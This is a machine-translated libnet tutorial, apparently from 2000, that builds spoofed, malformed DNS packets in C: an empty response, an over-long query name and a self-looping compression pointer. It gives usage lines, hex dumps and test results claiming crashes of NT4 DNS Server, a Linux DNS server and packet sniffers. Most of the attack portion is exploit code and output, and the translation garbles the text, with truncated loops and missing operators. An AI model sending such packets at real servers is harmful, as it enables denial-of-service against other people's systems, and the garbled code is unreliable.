Example of LIBNET (8)
Author: small four
Home: http://www.nsfocus.com
Date: 2000-08-02 11:33
Page, I went to the moment to appreciate the charm of C language, see the following function prototype:
INT libnet_build_dns (u_short id, u_short flags, u_short num_q,
U_SHORT NUM_ANWS_RR, U_SHORT NUM_AUTH_RR,
U_SHORT NUM_ADDI_RR, Const U_CHAR * PAYLOAD,
INT payload_s, u_char * buf);
This function is used to construct a DNS message. The meaning of each of the ginseng is not explained by LiBNet Manual.
A very detailed explanation is given in subsection (7), and see it by yourself. Flags and the next four Number use
See the way you have obtained, don't do any conversion, such as expectations to see the Flags field is 0x8000 in NetXray.
You will specify 0x8000 directly here, Number is the same.
/usr/include/libnet/include/libnet/Libnet- Headers.h as the macro definition:
#define libnet_dns_h 0xc / * DNS Header Base: 12 bytes * /
Do not do the things, come to a very simple abnormal DNS response group, which is said to have a response group in this format.
NT's DNS Server causes DOS attacks, but I have no success, I don't know what age.
The command line specifies the target IP address, and the source IP does not specify the number of random numbers, and then the DNS response group number.
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Void DNSSEND (U_LONG SRCIP, U_LONG DSTIP, U_LONG DNSNUMBER)
{
u_long d;
/ * Construct IP head * /
LIBNET_BUILD_IP (libnet_UDP_H LIBNET_DNS_H, / * IP Data Area * /
Iptos_lowdelay, / * ip TOS * /
(U_short) random (), / * ip id * /
0, / * frag stuff * /
255, / * ttl * /
Ipproto_UDP, / * Upper Layer Agreement * /
SRCIP, / * BIG-endian order * /
Dstip, / * target ip * /
NULL, / * No option * /
0, / * Option length zero * /
Packet); / * Pointing IP head * /
/ * Construct UDP head * /
LIBNET_BUILD_UDP (53, / * source port * /
53, / * Target Port * /
PACKET LIBNET_IP_H LIBNET_UDP_H, / * PayLoad * / libnet_dns_h, / * payload length * /
Packet libnet_ip_h);
/ * Texture abnormal DNS response packet head * /
LIBNET_BUILD_DNS (0, 0x8000, 0, 0, 0, 0, NULL, 0,
PACKET LIBNET_IP_H LIBNET_UDP_H);
/ * Calculate UDP checksum, IP checks, calculated by kernel * /
LIBNET_DO_CHECKSUM (packet, ipproto_udp, libnet_udp_h libnet_dns_h);
For (D = 0; D { / * Send DNS message * / Libnet_write_ip (Rawsocket, Packet, Packet_size); } / * End of for * / Return; } / * End of dnssend * / -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- USAGE: ./dki [--si srcip] [--DI DSTIP] [--NUM DNSNUMBER] This DOS did not test it on a wide area, I don't know what version of NT DNS Server, the local area. The network is more than the frozen target host. The test results are as follows: 1) 10.60 is NT4 DNS, which is completely frozen, but does not affect from 8.90 ping 10.60, it does not affect IIS service. 2) 0.2 is Linux DNS, which is completely frozen, from 8.90 unable to ping 0.2, Telnet 192.168.0.2 53 Failure, I amazed. This so-called exception DNS response packet format is as follows: 00 00 11 11 11 00 10 14 FF FF FF 08 00 45 10 00 28 6e 17 00 00 FF 11 BB 98 C0 A8 08 5A C0 A8 08 5A 00 35 00 35 00 14 ED 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 At the end, I can see the problem, the number of questions, the number of questions is zero, and Flags indicates that this is one Positive parsing response group, maybe, it is impossible! But for some DNS implementations, it does not belong to the error message, Trying to explain it when it is finished. About DNS can be imagined, there are too many DOS, for example, the DNS request packet is normal, it will not appear In fact, in fact, I don't confirm that there is a compressed format, how to respond to this; As far as the analysis software is implemented, they will parse the DNS request packets that appear in compression format and have not reported. The opportunity is to start this, if the pointer begins to loop, Netxray is attempting to decode this message. Termination, Sniffer Pro 2.6 and its later version have protected this hand, although it also analyzes the compressed format, Infinite loop, but made a boundary judgment, not that the process is not terminated. No longer test the other system Sniffer. Why do this loop in the request group instead of a response group? Because the ID of the response packet may be Judgment, which is discarded, although the compression format in the response packet will be parsed. I can only gambling the DNS implementation of each system to call the same function when handling the problem unit and the answer unit, and there is no distinguishing between the current In analyzing which unit, if I am right, then this DNS is dead. Note that when the Snifer is fighting Waiting, since the ID will not be judged, there is no need to group response grouping. In addition, is there any length limit in the non-compressed format? If not, you can expand infinite, because the end sign is not It is the length of the length. I wrote another two test programs to do the above boundary tests, which is intended to deal with DNS Server, I can't deal with it. Sniffer. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- ... DNSDataSize = 13 Maxiplusone * JunkNumber; Packet_size = DNSDataSize; FPRINTF (stderr, "[dns killing ...] / n"); / * Allocated memory and initialize into zero * / LIBNET_INIT_PACKET (Packet_size, & packet); / * Some data of DNS packets here * / DNSDATA = packet libnet_ip_h libnet_udp_h libnet_dns_h; DNSDATA [0] = 0x03; / * www * / DNSDATA [1] = 0x77; DNSDATA [2] = 0x77; DNSDATA [3] = 0x77; DNSDATAINDEX = 4; For (j = 0; j { DNSDATA [DNSDataIndex ] = maxi; For (i = 0; i { DNSData [DNSDataIndex ] = Junkchar; } } / * End of for * / DNSData [DNSDataIndex ] = 0x03; / * com * / DNSDATA [DNSDataIndex ] = 0x63; DNSDATA [DNSDataIndex ] = 0x6f; DNSDATA [DNSDataIndex ] = 0x6d; DNSData [DNSDataIndex ] = 0x00; / * End Sign * / DNSDATA [DNSDataIndex ] = 0x00; DNSDATA [DNSDataIndex ] = 0x01; DNSDATA [DNSDataIndex ] = 0x00; DNSDATA [DNSDataIndex] = 0x01; / * Create RAW_SOCKET * / Rawsocket = libnet_open_raw_sock (ipproto_raw); DNSSEND (SRCIP, DSTIP, DNSNUMBER); / * Close Raw_Socket * / LIBNET_CLOSE_RAW_SOCK (Rawsocket); / * Release the memory * / libnet_destroy_packet (& packet) assigned by libnet_init_packet (); ... -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Usage: ./dkii [--si srcip] [--DI DSTIP] [--NUM DNSNUMBER] [--junk junknumber] During the test, it is found that there is no need to intervene in the pointer to manufacture an infinite loop, as long as the query message non-compressed format is unusually expanded It is sufficient to terminate your own process when NetXray parsing (DECODE). For example, when -junk 4, start on 8.90 Netxray, NetXray was forced to terminate when Decode. Sniffer Pro to fight abnormal DNS packets Netxray stabilizes. LANEXPLORE 3.5 is terminated when trying to resolve this message. The exception DNS request packet sent by DKII is similar to the following description, the so-called JunkNumber is specified 3F 61 ... 61 is the number of units. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- 42 83 ID identifier, randomization 01 00 param Parameters forward to parsing request packet, allowing recursive analysis 00 01 QTCOUNT number 00 00 00 ANCOUNT Answers 00 00 AUCOUNT Management Agency 00 00 00 other information 03 77 77 77 WWW, the length domain is 3 3F 61 ... 61 length domain is 63 3F 61 ... 61 length domain is 63 ... 3F 61 ... 61 length domain is 63 03 63 6F 6D COM, the length domain is 3 00 end 00 01 TYPE = A Record 00 01 class = in - the arpa internet -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- ... DNSDataSize = 15; Packet_size = DNSDataSize; FPRINTF (stderr, "[dns killing ...] / n"); / * Allocated memory and initialize into zero * / LIBNET_INIT_PACKET (Packet_size, & packet); / * Some data of DNS packets here * / DNSDATA = packet libnet_ip_h libnet_udp_h libnet_dns_h; DNSDATA [0] = 0x03; / * www * / DNSDATA [1] = 0x77; DNSDATA [2] = 0x77; DNSData [3] = 0x77; DNSDATA [4] = 0xc0; / * pointer = 12, actually point to WWW * / DNSDATA [5] = 0x0c; DNSDATA [6] = 0x03; / * com * / DNSDATA [7] = 0x63; DNSDATA [8] = 0x6f; DNSDATA [9] = 0x6d; DNSData [10] = 0x00; / * End Sign * / DNSDATA [11] = 0x00; DNSDATA [12] = 0x01; DNSDATA [13] = 0x00; DNSDATA [14] = 0x01; / * Create RAW_SOCKET * / ... -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Usage: ./dkiii [--si srcip] [--DI DSTIP] [--NUM DNSNUMBER] The exception DNS request packet sent by DKIII is similar to the following description, manufactured a parsing cycle, NetXRay Termination, LanexPlore 3.5 is extremely terminated when trying to resolve the class message. -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- 42 83 ID identifier, randomization 01 00 param Parameters forward to parsing request packet, allowing recursive analysis 00 01 QTCOUNT number 00 00 00 ANCOUNT Answers 00 00 AUCOUNT Management Agency 00 00 00 other information 03 77 77 77 WWW, the length domain is 3 C0 0C pointer = 12 If a pointer does not appear, a pointer appears, parsing cycles 03 63 6F 6D COM, the length domain is 3 00 end 00 01 TYPE = A Record 00 01 class = in - the arpa internet -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- ADAM works as follows: Operation ./dkii - Si 192.168.10.60 - Di 192.168.10.60 - Num 5 - Junk 4 caused NT4 SP5 DNS Server crashes. Operation ./dkiii - Si 192.168.10.60 - Di 192.168.10.60 - Num 5 is also caused NT4 SP5 DNS Server crashes. The above operation requires that the source IP is consistent with the target IP, which can be precisely reproduced, where DKIII is fast, DKII attack Wait a little later, you can see the effect. Net Start DNS can be recovered. SP6 is already invalid. Now filtering the source IP is equal to the target IP in the network structure, it is difficult to Domain online initiating attacks. DOS on DNS comes to a paragraph.
